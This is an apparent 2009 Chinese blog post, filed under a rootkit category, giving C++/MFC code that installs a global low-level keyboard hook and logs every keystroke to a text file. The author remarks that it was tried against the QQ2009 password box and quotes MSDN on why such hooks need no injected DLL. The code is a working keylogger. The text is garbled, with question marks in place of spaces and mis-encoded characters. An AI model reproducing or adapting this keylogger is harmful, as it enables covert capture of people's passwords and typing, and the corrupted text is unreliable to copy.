|
|
Posted on 2009-11-17 09:12 S.l.e!ep.¢% 閱讀(188) 評論(0) 編輯 收藏 引用 所屬分類: RootKit
接著 About ShutDown of Windows(二) ?繼續(xù),將代碼繼續(xù)改進(jìn) HHOOK?g_Hook;
LRESULT?CALLBACK?MyKeyHook(int?code,?WPARAM?wParam,?LPARAM?lParam)
{
#if?(_WIN32_WINNT?<?0x0400)
/*
?*?Structure?used?by?WH_KEYBOARD_LL
?*/
typedef?struct?tagKBDLLHOOKSTRUCT?{
????DWORD???vkCode;
????DWORD???scanCode;
????DWORD???flags;
????DWORD???time;
????DWORD???dwExtraInfo;
}?KBDLLHOOKSTRUCT,?FAR?*LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
#endif
????PKBDLLHOOKSTRUCT?kbDLLHOOK?=?(PKBDLLHOOKSTRUCT)lParam;
????
????const?char?*info?=?NULL;
????
????if?(wParam?==?WM_KEYDOWN)
????????info?=?"key?down";????
????else?if?(wParam?==?WM_KEYUP)
????????info?=?"key?up";
????else?if?(wParam?==?WM_SYSKEYDOWN)
????????info?=?"sys?key?down";????
????else?if?(wParam?==?WM_SYSKEYUP)
????????info?=?"sys?key?up";
????FILE*?f?=?fopen("hook.txt",?"a+");
????CString?strLog;
????strLog.Format("%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);
????fwrite(strLog,?1,?strLog.GetLength(),?f);
????fclose(f);
????//?always?call?next?hook
????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
}??????
BOOL?CHookTestDlg::OnInitDialog()
{
????CDialog::OnInitDialog();
????//?Add?"About "?menu?item?to?system?menu.
????//?IDM_ABOUTBOX?must?be?in?the?system?command?range.
????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
????ASSERT(IDM_ABOUTBOX?<?0xF000);
????CMenu*?pSysMenu?=?GetSystemMenu(FALSE);
????if?(pSysMenu?!=?NULL)
????{
????????CString?strAboutMenu;
????????strAboutMenu.LoadString(IDS_ABOUTBOX);
????????if?(!strAboutMenu.IsEmpty())
????????{
????????????pSysMenu->AppendMenu(MF_SEPARATOR);
????????????pSysMenu->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
????????}
????}
????//?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
????//??when?the?application's?main?window?is?not?a?dialog
????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
????
????//?TODO:?Add?extra?initialization?here
#ifndef?WH_KEYBOARD_LL
????#define?WH_KEYBOARD_LL?13
#endif
????
????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
????
????if(?g_Hook?==?NULL?)
????????AfxMessageBox("Failed?to?Set?Hook");
????
????return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
} 已經(jīng)實(shí)現(xiàn)了HOOK鍵盤消息(題外話:對于普通的程序確實(shí)可行,但對于QQ2009的PwdEdit顯示出來的東西是不對的,明顯QQ2009的PwdEdit對消息加密過)
用 SysCheck 工具查看,這個EXE也并沒有注入到其它進(jìn)程
MSDN的解釋
WH_KEYBOARD_LLWindows NT/2000/XP: Installs a hook procedure that monitors low-level keyboard input events. For more information, see the LowLevelKeyboardProc hook procedure.
If the input comes from a call to keybd_event, the input was "injected". However, the WH_KEYBOARD_LL hook is not injected into another process. Instead, the context switches back to the process that installed the hook and it is called in its original context. Then the context switches back to the application that generated the event.
???????? 一般情況下,全局消息鉤子要依賴于一個DLL才能夠正常工作。
但實(shí)際上不是這樣的。有某些全局鉤子可以不依賴于任何DLL而正常工作的。這些鉤子包括,WH_JOURNALPLAYBACK,WH_JOURNALRECORD,WH_KEYBOARD_LL,WH_MOUSE_LL。為什么這些鉤子可以不依賴于DLL而正常工作呢?我們可以從MSDN中得到答案,MSDN中對于這四種鉤子都這樣的描述“This hook is called in the context of the thread that installed it.”,翻譯成中文意思是鉤子函數(shù)的調(diào)用是在安裝鉤子的線程上下文中進(jìn)行的,說得更明白些,意思就是這些鉤子是在哪個線程當(dāng)中安裝的,其鉤子函數(shù)就在哪個線程中執(zhí)行。所以使用這四種鉤子是達(dá)不到代碼注入的效果的,當(dāng)然也就可以不依賴于任何DLL了。MSDN中只對個別鉤子指出了必須還是沒有必要使用DLL。
|